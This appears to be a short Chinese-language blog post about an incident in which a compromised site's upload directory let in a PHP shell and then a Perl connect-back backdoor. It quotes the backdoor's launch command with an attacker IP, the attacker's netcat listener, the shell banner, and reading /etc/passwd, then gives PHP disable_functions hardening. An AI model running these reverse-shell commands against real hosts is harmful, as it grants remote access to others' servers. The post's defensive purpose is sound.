一個實例,有一台 Linux 主機,發現一個奇怪的程序在跑
perl dc.txt hackerip 2121
找一找,原來是某個網站被放了 phpshell (通常是 upload 目錄沒過濾只能放什麼,所以連 php 程式都進來了,當然網站程式漏洞才丟的進來),然後被再上傳一個 perl 程式執行 (我找了 github 上有同一支)
這支 perl 執行後是連線到遠方的 hacker 端,而 hacker 端則用如下方式,讓受害者可以連過來
nc -vv -l -p 2121
當連線建立了,hacker 端就可以看到如下訊息
listening on [any] 2121 ... connect to [127.0.0.1] from hacker [127.0.0.1] 33098 --== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- --==Systeminfo==-- Linux victim 2.6.9-89.EL #1 Mon Jun 22 12:19:40 EDT 2009 i686 i686 i386 GNU/Linux --==Userinfo==-- uid=48(apache) gid=48(apache) groups=48(apache),2522(wow) --==Directory==-- /var/www/html/ssorc.tw --==Shell==--
這時 hacker 端也可以在這裡下 ls 或 cat /etc/passwd 等,同等 apache user 在 linux ssh 底下的權限,恐佈喔
怎麼防止
PHPINFO 中有 master 及 local value 的參數設定,master value 一定要設定如下才行,只有 local 設定是無效的,它讓 phpshell 不能執行指令動作
disable_functions = exec,passthru,proc_open,shell_exec,system,popen,dl
在 PHP 5 版後,只要設定 local value ,master value 就也會同時限制住
留言